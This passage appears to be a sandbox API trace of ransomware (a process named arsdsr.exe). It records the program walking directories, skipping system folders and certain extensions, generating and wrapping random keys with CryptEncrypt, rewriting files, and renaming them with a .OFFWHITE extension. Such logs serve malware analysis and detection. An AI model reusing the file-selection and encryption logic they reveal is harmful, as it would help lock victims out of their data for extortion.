[0143.838] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x204, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.838] WriteFile (in: hFile=0x1e4, lpBuffer=0x522260*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522260*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.838] GetProcessHeap () returned 0x500000 [0143.838] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4) returned 0x522270 [0143.838] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.838] ReadFile (in: hFile=0x1e4, lpBuffer=0x522270, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x522270*, lpNumberOfBytesRead=0x295cb40*=0x4, lpOverlapped=0x0) returned 1 [0143.838] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.838] WriteFile (in: hFile=0x1e4, lpBuffer=0x522270*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522270*, lpNumberOfBytesWritten=0x295cb4c*=0x4, lpOverlapped=0x0) returned 1 [0143.838] GetProcessHeap () returned 0x500000 [0143.838] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x522270 | out: hHeap=0x500000) returned 1 [0143.838] CloseHandle (hObject=0x1e4) returned 1 [0143.841] GetProcessHeap () returned 0x500000 [0143.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.841] GetProcessHeap () returned 0x500000 [0143.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.841] GetProcessHeap () returned 0x500000 [0143.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.841] GetProcessHeap () returned 0x500000 [0143.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.841] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" [0143.841] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.OFFWHITE" [0143.841] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.offwhite")) returned 1 [0143.842] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".") returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="..") returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="...") returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="windows") returned -1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="$recycle.bin") returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="rsa") returned -1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="ntuser.dat") returned -1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="programdata") returned -1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="appdata") returned 1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="program files") returned -1 [0143.842] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="program files (x86)") returned -1 [0143.842] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.842] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" [0143.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.842] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".exe") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".log") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".cab") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".cmd") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".com") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".cpl") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".ini") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".dll") returned 1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".url") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".ttf") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".mp3") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".pif") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".mp4") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".OFFWHITE") returned -1 [0143.843] lstrcmpiW (lpString1=".H1Q", lpString2=".msi") returned -1 [0143.843] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.843] GetProcessHeap () returned 0x500000 [0143.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522270 [0143.843] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.843] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=873232) returned 1 [0143.843] GetProcessHeap () returned 0x500000 [0143.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.844] GetProcessHeap () returned 0x500000 [0143.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.844] GetProcessHeap () returned 0x500000 [0143.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.844] GetProcessHeap () returned 0x500000 [0143.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.844] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.844] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.844] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.844] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.845] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xd5310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.845] SetLastError (dwErrCode=0x0) [0143.845] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.847] GetLastError () returned 0x0 [0143.847] GetLastError () returned 0x0 [0143.847] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xd5410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.847] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.847] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xd5510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.847] WriteFile (in: hFile=0x1e4, lpBuffer=0x522270*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522270*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.847] GetProcessHeap () returned 0x500000 [0143.847] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd5310) returned 0x2a60020 [0143.847] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.848] ReadFile (in: hFile=0x1e4, lpBuffer=0x2a60020, nNumberOfBytesToRead=0xd5310, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295cb40*=0xd5310, lpOverlapped=0x0) returned 1 [0143.973] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.973] WriteFile (in: hFile=0x1e4, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0xd5310, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295cb4c*=0xd5310, lpOverlapped=0x0) returned 1 [0143.977] GetProcessHeap () returned 0x500000 [0143.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0143.983] CloseHandle (hObject=0x1e4) returned 1 [0143.983] GetProcessHeap () returned 0x500000 [0143.983] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.983] GetProcessHeap () returned 0x500000 [0143.983] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.983] GetProcessHeap () returned 0x500000 [0143.983] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.983] GetProcessHeap () returned 0x500000 [0143.983] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.983] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" [0143.983] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.OFFWHITE" [0143.983] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.offwhite")) returned 1 [0143.984] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x249fa376, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xd5310, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 0 [0143.984] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0143.984] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 0 [0143.984] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0143.985] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="1.0", cAlternateFileName="")) returned 0 [0143.985] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0143.985] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Client", cAlternateFileName="")) returned 0 [0143.985] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0143.985] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Crypto", cAlternateFileName="")) returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="...") returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="windows") returned -1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="$recycle.bin") returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="rsa") returned -1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="ntuser.dat") returned -1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="programdata") returned -1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="appdata") returned 1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="program files") returned -1 [0143.985] lstrcmpiW (lpString1="Crypto", lpString2="program files (x86)") returned -1 [0143.985] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0143.985] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Crypto" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto") returned="C:/Users\\All Users\\Microsoft\\Crypto" [0143.985] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\" [0143.985] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\" [0143.985] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\*.*") returned="C:/Users\\All Users\\Microsoft\\Crypto\\*.*" [0143.986] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0143.986] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.986] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0143.986] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.986] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.986] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="DSS", cAlternateFileName="")) returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2=".") returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="..") returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="...") returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="windows") returned -1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="$recycle.bin") returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="rsa") returned -1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="ntuser.dat") returned -1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="programdata") returned -1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="appdata") returned 1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="program files") returned -1 [0143.986] lstrcmpiW (lpString1="DSS", lpString2="program files (x86)") returned -1 [0143.987] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\" [0143.987] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\", lpString2="DSS" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS" [0143.987] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\" [0143.987] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\" [0143.987] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" [0143.987] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0143.987] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0143.987] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0143.987] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0143.987] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0143.987] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0143.987] lstrcmpiW (lpString1="MachineKeys", lpString2=".") returned 1 [0143.987] lstrcmpiW (lpString1="MachineKeys", lpString2="..") returned 1 [0143.987] lstrcmpiW (lpString1="MachineKeys", lpString2="...") returned 1 [0143.987] lstrcmpiW (lpString1="MachineKeys", lpString2="windows") returned -1 [0143.987] lstrcmpiW (lpString1="MachineKeys", lpString2="$recycle.bin") returned 1 [0143.988] lstrcmpiW (lpString1="MachineKeys", lpString2="rsa") returned -1 [0143.988] lstrcmpiW (lpString1="MachineKeys", lpString2="ntuser.dat") returned -1 [0143.988] lstrcmpiW (lpString1="MachineKeys", lpString2="programdata") returned -1 [0143.988] lstrcmpiW (lpString1="MachineKeys", lpString2="appdata") returned 1 [0143.988] lstrcmpiW (lpString1="MachineKeys", lpString2="program files") returned -1 [0143.988] lstrcmpiW (lpString1="MachineKeys", 